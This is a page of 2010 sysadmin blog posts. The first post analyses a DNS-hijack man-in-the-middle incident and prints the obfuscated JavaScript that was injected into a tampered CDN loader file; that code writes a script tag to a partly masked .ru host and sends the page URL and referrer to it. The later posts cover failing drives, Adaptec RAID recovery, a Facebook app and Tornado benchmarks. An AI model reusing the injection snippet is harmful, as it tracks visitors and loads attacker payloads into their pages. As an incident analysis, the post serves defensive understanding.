Man in the Middle Attack

October 10th, 2010

A few days ago a client had a window opened up in their browser with an Ip address and a query string parameter with his domain name. He asked me if his wordpress site had been hacked. I took a look through the files on the disk, dumped the database and did a grep, looked around the site using Chrome, Firefox and Safari and saw nothing. I even used Firefox to view generated source as sometimes scripts utilize the fact that JQuery is already loaded to load their extra payload through a template or addon.

Nothing. He runs a mac, his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but, he said something that was very confusing – our IPad’s do it too.

No Flash on IPad, can’t install most of the toolbar code on the IPad due to a fairly tight sandbox and the same behavior across multiple machines. Even machines that weren’t accessing his site were popping up windows/tabs in Safari.

I had him check his System Preferences, TCP/IP and the DNS settings and he read the numbers. The last one of 1.1.1.1 seemed odd, but, wouldn’t normally cause an issue since 1.0.0.0/8 isn’t routed. The other two DNS server IPs were read off and written down. Doing a reverse IP lookup resulted in a Not Found. Since he was on RoadRunner, I found that a bit odd, so, I did a whois and found out that both of the IP addresses listed as DNS were hosted in Russia.

Now we’re getting somewhere. The settings on his machine were grabbed from DHCP, so, that meant his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page and there they were. We modified them to use google’s resolvers and changed the password on the router to something a little more secure.

We checked a few settings in the Linksys router and remote web access wasn’t enabled, so, the only way it could have happened is a Javascript exploit that logged into the router and made the changes. However, now the fun began. Trying to figure out what was actually intercepted. Since I had a source site that I knew caused issues, through some quick investigative work, we find a number of external URLs loaded on his site that might be common enough and small enough to be of interest. Since we know that particular scripts require jQuery, we can look at anything that calls something external in his source.

First thought was the Twitter sidebar, but, that calls Twitter directly which means all of that traffic would have to be proxied. Certainly wouldn’t want to do that when you have limited bandwidth. Feedburner seemed like a potential vector, but, probably very limited access and those were hrefs, so, they would have had to have been followed. The Feedburner widget wasn’t present. Bookmarklet.amplify.com seemed like a reasonable target, but, the DNS for it through the Russian DNS servers and other resolvers was the same. That isn’t to say that they couldn’t change it on a per request basis to balance for traffic, but, we’re going on the assumption it’ll be a fire and forget operation.

After looking through, statcounter could have been a suspect, but, again the DNS entries appeared to be the same, however, it does fit the criteria of a small javascript on a page that might have jquery.

However, the next entry appeared to be a good candidate. cdn.wibiya.com which requires jquery and loads a small javascript. DNS entries are different – though, we could attribute that to the fact it is a CDN, but, we get a CNAME from google’s resolvers, and an IN A record from the suspect DNS servers.

The Loader.js contains a tiny bit of extra code at the bottom containing:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + 'xxxx.ru/js.php?id=36274';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';
    document.write(xxxxxx_html);

I did a few checks to see if I could find any other hostnames that they had filtered, but, wasn’t able to find anything with a quick glance. Oh, and these guys minified the javascript – even though wibiya didn’t. And no, the server hosting the content was in the USA, only the DNS server was outside the USA.

After years of reading about this type of attack, it is the first time I was able to witness it first-hand.

Seagate Drive Fails right out of the shrink wrap

October 8th, 2010

We keep a number of drives on hand to replace failures. Yesterday, a drive started failing as evidenced by the smartd logs and the machine having sudden load spikes for no reason. Looking through the logs did show evidence that the drive was being hard reset and reconnected.

So, we installed the following drive:

Model Family:     Seagate Barracuda 7200.10 family
Device Model:     ST3250820AS

Within 12 hours, here is a piece of the smartd log:

  7 Seek_Error_Rate         0x000f   085   062   030    Pre-fail  Always       -       352398337
  9 Power_On_Hours          0x0032   099   099   000    Old_age   Always       -       1545
195 Hardware_ECC_Recovered  0x001a   069   060   000    Old_age   Always       -       181870471

The drive was purchased from our supplier perhaps a year ago when we bought a large batch of these bulk. It was previously unopened, in the original sealed static bag and it already registers 1545 hours. I trust our hardware supplier as we’ve been buying from them for almost 11 years, but, either they or Seagate rewrapped a drive to make it appear new.

The drive that it replaced was an older Western Digital:

  9 Power_On_Hours          0x0032   060   060   000    Old_age   Always       -       29872
 12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       39
199 UDMA_CRC_Error_Count    0x000a   200   253   000    Old_age   Always       -       53

Almost 30000 hours, 39 power cycles. There’s a reason we usually buy Western Digital.

Adaptec 31205 under Debian

September 25th, 2010

We have a Storage Server with 11 2tb drives in a Raid5. During a recent visit, we heard the alarm, but, no red light on any drive was visible nor was the light on the front of the chassis lit. Knowing it was a problem waiting to happen, but, without being able to see which drive had caused the array to fail, we scheduled a maintenance window that happened to coincide with a kernel upgrade.

In the meantime, we attempted to install the RPM and java management system to no avail. So, we weren’t able to read the controller status to find out what the problem was.

When we rebooted the machine, the array status was degraded and it prompted us to hit enter to accept the configuration or control-A to enter the admin. We entered the admin, Manage array, all drives are present and working. Immediately the array status changes to rebuilding with no indication which drive had failed and was being readded.

Exiting the admin, saving the config, the client said, pull the machine offline until it is fixed. This started what seemed like an endless process. We figured we would let it rebuild while it was online, but, disable it from the cluster. We installed a new kernel, 2.6.36-rc5, rebooted and this is where the trouble started. On boot, the new kernel got an I/O error, the channel hung, it forced a reset and then sat there for about 45 seconds. After it continued, it paniced as it was unable to read /dev/sda1.

Rebooting and entering the admin, we’re faced with an array that is marked offline. After identifying each of the drives through disk utils to make sure that they are recognized, we forced the array back online and rebooted into the old kernel. As it turns out, something in our 2.6.36-rc5 disables the array and sets it offline. It takes 18 hours to rebuild the array and return it to optimal status.

After the machine comes up, we knew we had a problem on one of the directories on the system and this seemed like an opportune time to run xfs_repair. About 40 minutes into it, we run into an I/O error with a huge block number and bam, the array is offline again.

In Disk Util in the ROM we start the test on the first drive. It takes 5.5 hours to run through the first disk which puts us at an estimated 60+ hours to check all 11 drives in the array. smartctl doesn’t allow us to independently check the drives, so, we fire up a second machine and mount each of the drives looking for any possible telltale signs in the S.M.A.R.T. data stored on the drives. Two drives show some abnormal numbers and we have an estimated 11 hours to check those disks. 5.5 hours later, the first disk is clean, less than 30 minutes later, we have our culprit. Relocating a number of bad sectors results in the controller hanging again, yet, no red fault light anywhere to be seen, no indication in the Adaptec manager that this drive is bad.

Replacing the drive and going back into the admin shows us a greyed out drive which immediately starts reconstructing. We reboot the system into the older kernel and start xfs_repair again. After two hours, it has run into a number of errors, but no I/O Errors.

It is obvious we’ve had some corruption for quite some time. We had a directory we couldn’t delete because it claimed it had files, however, no files were in the directory. We had 2 directories with files that we couldn’t do anything with and couldn’t even mv them to an area outside our working directories. We figured it was an xfs bug that we had hit due to the 18 terabyte size of the partition, but guessed that an xfs_repair would fix this. It was a minor annoyance to the client until we could get to a maintenance interval so we waited. In reality, this should have been a sign that we had some issues and we should have pushed the client harder to allow us to diagnose this much earlier. There is some data corruption, but, this is the second in a pair of backup servers for their cluster. Resyncing the data to a known good source will fix this without too much difficulty.

After four hours, xfs_repair is reporting issues like:


bad directory block magic # 0 in block 0 for directory inode 21491241467
corrupt block 0 in directory inode 21491241467
        will junk block
no . entry for directory 21491241467
no .. entry for directory 21491241467
problem with directory contents in inode 21491241467
cleared inode 21491241467
        - agno = 6
        - agno = 7
        - agno = 8
bad directory block magic # 0 in block 1947 for directory inode 34377945042
corrupt block 1947 in directory inode 34377945042
        will junk block
bad directory block magic # 0 in block 1129 for directory inode 34973370147
corrupt block 1129 in directory inode 34973370147
        will junk block
bad directory block magic # 0 in block 3175 for directory inode 34973370147
corrupt block 3175 in directory inode 34973370147
        will junk block

It appears that we have quite a bit of data corruption due to a bad drive which is precisely why we use Raid.

The array failed, why didn’t the Adaptec on-board manager know which drive had failed? Had we gotten the Java application to run, I’m still not convinced it would have told us which drive was throwing the array into degraded status. Obviously the card knew something was wrong as the alarm was on. Each drive has a fault light and an activity light, but, all of the drives allowed the array to be rebuilt and claimed the status was Optimal. During initialization, the Adaptec does light the fault and activity lights for each drive so it seems reasonable that when the drive encountered errors, it could have lit the fault light so we knew which drive to replace. When running xfs_repair and receiving the I/O error where it couldn’t relocate the block, why didn’t the Adaptec controller immediately fail the drive?

All in all, I’m not too happy with Adaptec right now. A 2tb hard drive failed which cost us roughly 60 hours to diagnose and put back into service. The failing drive should have been tagged and removed from the raid set immediately and marked. As it is right now, even though it was running in degraded mode, we shouldn’t have seen any corruption, however, xfs_repair is finding a considerable number of errors.

The drives report roughly 5600 hours online which corresponds to the eight months we’ve had the machine online and based on the number of files xfs_repair is finding are bad, I believe that drive had been failing for quite some time and Adaptec has failed us. While we have a considerable number of Adaptec controllers, we’ve never seen a failure like this.

Facebook’s Javascript SDK and a short one page application

September 16th, 2010

While discussing a project with a client it occurred to me that perhaps you don’t need to get too complex to do something simple. Since using Facebook almost mandates that your surfer has Javascript enabled, we should be able to write a very simple application that posts to someone’s wall after asking for the ‘publish’ permission. After reading the documentation and looking through a few github repositories, the solution was quite simple.

While this code doesn’t use the non-blocking async javascript method, it is a good example. I’ve seen others that use the inline publish, but, for some reason I couldn’t get it to consistently open a dialog box rather than a popup – which Chrome conveniently blocked. I also ran into an issue that Facebook appears to aggressively cache objects that don’t explicitly set an expire time. While I find that acceptable for the application’s long term goals, it did make debugging a slightly frustrating experience.

To try the application, http://apps.facebook.com/onepageapp/. A direct link to the code is available at http://fbapp.cd34.com/opa/index.txt.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <title>One Page App</title>
    </head>
    <body>
<div id="fb-root"></div>
Thanks for clicking.  This is just a test to make sure that the application
works as expected.
<p>
You can skip posting to the wall if you would like.
<script src="http://connect.facebook.net/en_US/all.js"></script>
<script>
appid = '154516391233318';
name = 'One Page App';
caption = 'A single page application designed to test whether it could be done';
description = 'A quick page that allows you to post to someone\'s wall';
href = 'http://apps.facebook.com/onepageapp/';
user_message_prompt = 'Post a sample to your wall';
message = 'Let\'s do a sample post to the wall.';
action_text = 'Get the code';
action_href = 'http://fbapp.cd34.com/opa/index.txt';

FB.init({appId  : appid, status : true, cookie : true, xfbml  : false });
FB.getLoginStatus(function(response) {
  if (response.session) {
    FB.ui(
      {
        method: 'stream.publish',
        display: 'dialog',
        message: message,
        attachment: {
          name: name,
          caption: caption,
          description: description,
          href: href
        },
        action_links: [
          { text: action_text, href: action_href }
        ],
        user_message_prompt: user_message_prompt
      },
      function(response) {
        self.location.href='/opa/thanks.html';
      }
    );
  } else {
    top.location.href='https://graph.facebook.com/oauth/authorize?client_id='+appid+'&redirect_uri='+href+'&display=page&scope=publish_stream';
  }
});
</script>
</body>
</html>

A weekend with Tornado

June 29th, 2010

After working on a Pylons project for a week or so, there was a minor part of it that I felt didn’t need the complexity of a framework. Some quick benchmarking of the most minimal Pylons/SQLAlchemy project I could muster came in around 200 requests per second which put me at roughly 12 million requests per day based on the typical curve.

Within 15 minutes of installing Tornado and using their simple hello world example, I imported SQLAlchemy and ended up boosting this to 280 requests per second. As I really didn’t need any of the features from the ORM, I decided to use tornado.database which isn’t much more than a bare wrapper to python-mysql. Even with a single worker process, I was able to get 870 requests per second. 56 million requests per day, without any tuning?

I’m reasonably impressed. Once I put it on production hardware, I’m thinking I’ll easily be able to count on double those numbers if not more.

Next weekend, Traffic Server.

Entries (RSS) and Comments (RSS).
Cluster host: li